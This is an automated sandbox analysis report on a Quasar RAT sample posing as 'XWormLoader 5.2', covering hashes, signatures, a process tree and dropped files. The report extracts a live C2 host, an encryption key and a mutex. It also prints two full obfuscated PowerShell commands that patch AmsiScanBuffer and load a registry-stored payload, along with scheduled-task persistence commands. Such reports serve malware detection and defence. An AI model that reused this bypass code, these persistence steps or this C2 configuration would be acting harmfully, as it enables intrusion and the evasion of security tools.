Analysis
-
max time kernel
150s -
max time network
135s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
-
submitted
03-05-2024 17:47
General
-
Target
XWormLoader 5.2 x64.exe
-
Size
329KB
-
MD5
893ee266eef0ca3b11bdb859839df69d
-
SHA1
1d2eeab0c7ae7e9ec180017d8092f23abbea6d2b
-
SHA256
40c49ccfb00bd4ca02d587af4f03823650dde39b5fe31dcde8bbdc3fa508bea3
-
SHA512
694843c573f2aeec876eaa0ef329268553cde23cc4fdced9371041c3df097eec00b44894423ee00a7c9a1444f0bb17a089cb48c5430dfdaafa1265e5cd1b85f5
-
SSDEEP
6144:HfPtIkJwV7LtIgxfUFdLdassJFxgXS+vK5Qav9qm:HflXJwFmmUFdLs9H51
Score
10/10
Malware Config
Extracted
Family
quasar
Version
3.1.5
Botnet
SLAVE
C2
even-lemon.gl.at.ply.gg:33587
Mutex
$Sxr-3vDee7FzoJnhqjuE3n
Attributes
-
encryption_key
AqYe7s30CMq7SVM0oxKR
-
install_name
Discord.exe
-
log_directory
Logs
-
reconnect_delay
1000
-
startup_key
Discord
-
subdirectory
Discord
Signatures
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar payload 2 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 5 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 8 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 64 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 35 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{b7ed216d-36c9-4799-9373-e801882d34a0}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{2e2f3f37-3868-43d0-99a9-e46554d2d109}2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:kDafqIzcVOZr{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$dNJlpaIqkcJJOz,[Parameter(Position=1)][Type]$MYcnqmmqBr)$yOpGEbWgkBi=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+'f'+''+[Char](108)+''+'e'+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+'D'+''+[Char](101)+'l'+[Char](101)+''+[Char](103)+''+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+'e'+''+[Char](109)+'or'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType('M'+'y'+''+'D'+''+'e'+''+'l'+''+'e'+''+'g'+''+'a'+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+','+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+'c'+''+','+''+'S'+'e'+[Char](97)+''+'l'+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+[Char](97)+'ss',[MulticastDelegate]);$yOpGEbWgkBi.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$dNJlpaIqkcJJOz).SetImplementationFlags(''+'R'+''+'u'+'n'+[Char](116)+'i'+[Char](109)+''+'e'+''+[Char](44)+''+'M'+''+[Char](97)+''+'n'+'a'+[Char](103)+''+[Char](101)+'d');$yOpGEbWgkBi.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+'ke','P'+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+'H'+[Char](105)+''+[Char](100)+'eBy'+'S'+''+[Char](105)+'g'+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+'S'+'l'+'o'+''+'t'+','+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'al',$MYcnqmmqBr,$dNJlpaIqkcJJOz).SetImplementationFlags(''+'R'+''+'u'+''+'n'+'ti'+'m'+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+'ed');Write-Output $yOpGEbWgkBi.CreateType();}$tnmxbiJhbugcG=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+'.'+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+'f'+'e'+''+[Char](78)+''+'a'+'tiv'+'e'+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+'d'+''+[Char](115)+'');$igKlxdWSgQjiSu=$tnmxbiJhbugcG.GetMethod('G'+[Char](101)+''+[Char](116)+''+'P'+'ro'+'c'+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+'e'+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+'l'+[Char](105)+'c'+','+''+[Char](83)+'t'+[Char](97)+'t'+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$YZNYqkjNuIGkcAYiiRk=kDafqIzcVOZr @([String])([IntPtr]);$EwWqUOKINAEcWwSeVRgfKU=kDafqIzcVOZr @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$FrfownYyaSe=$tnmxbiJhbugcG.GetMethod('Ge'+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+''+'H'+''+'a'+''+[Char](110)+'d'+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+'el'+'3'+''+[Char](50)+''+'.'+''+'d'+''+'l'+''+[Char](108)+'')));$jWDCycmIrTcRTW=$igKlxdWSgQjiSu.Invoke($Null,@([Object]$FrfownYyaSe,[Object](''+[Char](76)+'o'+'a'+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+'r'+'a'+''+[Char](114)+''+'y'+''+[Char](65)+'')));$APlxsjdhGyvfAmovr=$igKlxdWSgQjiSu.Invoke($Null,@([Object]$FrfownYyaSe,[Object]('V'+'i'+'rt'+'u'+'al'+[Char](80)+''+[Char](114)+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$BSwitSz=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jWDCycmIrTcRTW,$YZNYqkjNuIGkcAYiiRk).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+'i'+'.'+[Char](100)+'ll');$bLpawPucSezYJCSSI=$igKlxdWSgQjiSu.Invoke($Null,@([Object]$BSwitSz,[Object](''+'A'+''+[Char](109)+'siSc'+[Char](97)+''+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+'e'+[Char](114)+'')));$whOefGtDTQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($APlxsjdhGyvfAmovr,$EwWqUOKINAEcWwSeVRgfKU).Invoke($bLpawPucSezYJCSSI,[uint32]8,4,[ref]$whOefGtDTQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$bLpawPucSezYJCSSI,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($APlxsjdhGyvfAmovr,$EwWqUOKINAEcWwSeVRgfKU).Invoke($bLpawPucSezYJCSSI,[uint32]8,0x20,[ref]$whOefGtDTQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+''+[Char](84)+'W'+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+[Char](116)+'ag'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:zLKekkAcQBKz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$adVrVglFxMCVww,[Parameter(Position=1)][Type]$CtHTcHsiCi)$mKEKnOLTYId=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+'f'+'l'+''+[Char](101)+'ct'+'e'+''+[Char](100)+''+[Char](68)+''+'e'+'leg'+'a'+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+'Mo'+'d'+''+'u'+''+[Char](108)+'e',$False).DefineType(''+'M'+'y'+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+'e'+''+[Char](84)+''+[Char](121)+'p'+[Char](101)+'','Cl'+[Char](97)+'ss'+[Char](44)+''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+'S'+'ea'+'l'+''+'e'+''+[Char](100)+','+[Char](65)+''+'n'+''+'s'+''+[Char](105)+'C'+'l'+''+'a'+''+'s'+''+[Char](115)+''+','+''+[Char](65)+''+'u'+'t'+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+'s'+'',[MulticastDelegate]);$mKEKnOLTYId.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+'p'+''+[Char](101)+''+[Char](99)+''+'i'+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+'m'+''+[Char](101)+','+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+'y'+''+[Char](83)+'i'+'g'+''+[Char](44)+'Pu'+[Char](98)+'l'+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$adVrVglFxMCVww).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'an'+'a'+''+'g'+''+[Char](101)+''+'d'+'');$mKEKnOLTYId.DefineMethod('I'+[Char](110)+'v'+[Char](111)+''+'k'+''+[Char](101)+'',''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+','+''+[Char](72)+'id'+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+'w'+'S'+''+[Char](108)+''+[Char](111)+'t'+[Char](44)+''+'V'+'i'+'r'+''+'t'+''+[Char](117)+''+'a'+'l',$CtHTcHsiCi,$adVrVglFxMCVww).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $mKEKnOLTYId.CreateType();}$fynOAwzELRnoL=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+''+[Char](101)+''+[Char](109)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+'c'+'r'+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+'.'+[Char](87)+'in'+[Char](51)+''+'2'+''+[Char](46)+'U'+'n'+'s'+'a'+''+'f'+'e'+'N'+''+[Char](97)+'t'+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+'h'+'o'+'ds');$VxwzBYUPewFweM=$fynOAwzELRnoL.GetMethod('Ge'+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'c'+''+'A'+''+'d'+''+'d'+''+'r'+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+'t'+[Char](97)+'t'+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RyLKsmYFYSXDFayTtes=zLKekkAcQBKz @([String])([IntPtr]);$tMopxRaipjETbivjIIuyRH=zLKekkAcQBKz @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$OdojkyFPqPj=$fynOAwzELRnoL.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](77)+''+'o'+'d'+[Char](117)+'l'+[Char](101)+''+[Char](72)+''+'a'+''+[Char](110)+''+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object]('ker'+[Char](110)+''+[Char](101)+''+'l'+''+[Char](51)+''+[Char](50)+'.'+'d'+'l'+'l'+'')));$vmvYdigRORuqkT=$VxwzBYUPewFweM.Invoke($Null,@([Object]$OdojkyFPqPj,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+'L'+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+'r'+''+'y'+'A')));$cKyJXOTKjnyXeoWQI=$VxwzBYUPewFweM.Invoke($Null,@([Object]$OdojkyFPqPj,[Object]('V'+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+'l'+''+[Char](80)+''+[Char](114)+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+''+'t'+'')));$wIyPKrh=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vmvYdigRORuqkT,$RyLKsmYFYSXDFayTtes).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+'.'+[Char](100)+''+[Char](108)+''+'l'+'');$YwxJjCNbuZgkOdBmU=$VxwzBYUPewFweM.Invoke($Null,@([Object]$wIyPKrh,[Object]('A'+[Char](109)+''+[Char](115)+'iS'+[Char](99)+'an'+[Char](66)+''+[Char](117)+'ffe'+[Char](114)+'')));$PBVqkxGJUr=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cKyJXOTKjnyXeoWQI,$tMopxRaipjETbivjIIuyRH).Invoke($YwxJjCNbuZgkOdBmU,[uint32]8,4,[ref]$PBVqkxGJUr);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$YwxJjCNbuZgkOdBmU,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cKyJXOTKjnyXeoWQI,$tMopxRaipjETbivjIIuyRH).Invoke($YwxJjCNbuZgkOdBmU,[uint32]8,0x20,[ref]$PBVqkxGJUr);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+'F'+''+[Char](84)+'W'+'A'+''+'R'+''+[Char](69)+'').GetValue(''+'$'+'7'+[Char](55)+''+[Char](115)+''+[Char](116)+''+'a'+''+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\sihost.exesihost.exe2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s TokenBroker1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\XWormLoader 5.2 x64.exe"C:\Users\Admin\AppData\Local\Temp\XWormLoader 5.2 x64.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\svchost.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Discord\Discord.exe"C:\Users\Admin\AppData\Roaming\Discord\Discord.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Discord\Discord.exe" /rl HIGHEST /f5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /delete /tn "Discord" /f5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0jSt7BAPWqCT.bat" "5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\SysWOW64\chcp.comchcp 650016⤵
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost6⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77Discord.exe" /tr "'C:\Users\Admin\AppData\Roaming\Discord\Discord.exe'" /sc onlogon /rl HIGHEST5⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77svchost.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\svchost.exe'" /sc onlogon /rl HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\XWormLoader 5.2 x32.exe"C:\Users\Admin\AppData\Local\Temp\XWormLoader 5.2 x32.exe"3⤵
- Executes dropped EXE
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 8444⤵
- Program crash
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\ApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -Embedding1⤵
-
C:\Windows\System32\InstallAgent.exeC:\Windows\System32\InstallAgent.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\0jSt7BAPWqCT.batFilesize
264B
MD57e4ac358e29bcd3664557eeb094b754f
SHA18a6cd618a423564073722d4e8dac82eadb94e3a9
SHA256e24fad0f0c507480565e6a74a5c3f346c1b6e797a05f2e50f2fcc372ea6184bc
SHA51247cb73573924ff5282104ad7eff1cc3ed43182e242b73eef7a5d43f4c77221819ddd30f7984505780f3fda953db95f6eaf9eb7013969f66e63eaaea43e95190e
-
C:\Users\Admin\AppData\Local\Temp\XWormLoader 5.2 x32.exeFilesize
109KB
MD5f3b2ec58b71ba6793adcc2729e2140b1
SHA1d9e93a33ac617afe326421df4f05882a61e0a4f2
SHA2562d74eb709aea89a181cf8dfcc7e551978889f0d875401a2f1140487407bf18ae
SHA512473edcaba9cb8044e28e30fc502a08a648359b3ed0deba85e559fe76b484fc8db0fc2375f746851623e30be33da035cec1d6038e1fcf4842a2afb6f9cd397495
-
C:\Users\Admin\AppData\Local\Temp\install.exeFilesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
C:\Users\Admin\AppData\Local\Temp\svchost.exeFilesize
409KB
MD561e7a9eaef04c1617ffff35c0287d234
SHA15a6ffedd75ac4e07594ccb6974ee8684d5128a35
SHA256b2b4be7ae20431c88115d561a6886f22ab3416595338e7e2eb361f0bb428b987
SHA5128ee9fd8d8631dd611ff539fc35ad4c26f7bfb4b8a26de12e03f48f3b87a7f18198c37ec187a1e8393aafb88e468e74c734cafcaf72f73b0afc55822762d767e6
-
C:\Windows\Temp\__PSScriptPolicyTest_qee5nvqs.kb1.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.logFilesize
3KB
MD556efdb5a0f10b5eece165de4f8c9d799
SHA1fa5de7ca343b018c3bfeab692545eb544c244e16
SHA2566c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108
